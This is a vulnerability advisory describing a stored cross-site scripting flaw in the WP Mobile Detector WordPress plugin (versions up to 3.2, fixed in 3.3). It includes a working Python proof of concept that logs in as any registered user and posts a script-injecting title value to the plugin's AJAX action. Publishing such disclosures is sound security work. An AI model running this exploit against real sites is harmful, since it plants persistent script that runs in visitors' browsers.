WP Mobile Detector <= 3.2 – Stored Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The WP Mobile Detector plugin exposes the AJAX action ‘websitez_options’ to all registered users on line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php. Providing specially crafted form values will result in a Persistent XSS attack on Mobile visitors.

Proof of Concept

import requests
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"websitez_options",
        "general[selected_mobile_theme]":"wz-mobile",
        "general[mobile_title]":"</title><script>alert(1)</script><title>" 
}
r = s.post(url, data=payload)

Affects Plugins

wp-mobile-detector

Fixed in 3.3

References

URL

https://g0blin.co.uk/g0blin-00050/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

James Hooker

Submitter website

https://research.g0blin.co.uk

Submitter twitter

Verified

No

WPVDB ID

7dd598c1-a401-4c67-bee4-b4a59a128fae

Timeline

Publicly Published

2015-06-25 (about 10 years ago)

Added

2015-06-25 (about 10 years ago)

Last Updated

2019-10-21 (about 6 years ago)

Other

Published

Title

Published

2024-12-17

Title

Landing Page Cat – Coming Soon Page, Maintenance Page & Squeeze Pages < 1.7.8 - Reflected Cross-Site Scripting

Published

2023-01-10

Title

User Meta Manager <= 3.4.9 - CSRF

Published

2021-06-30

Title

Newspaper < 11 - Reflected Cross-Site Scripting (XSS)

Published

2025-01-10

Title

Woo UPS Pickup < 2.6.6 - Reflected XSS

Published

2025-08-06

Title

Cost Calculator < 7.5 - Authenticated (Subscriber+) Stored Cross-Site Scripting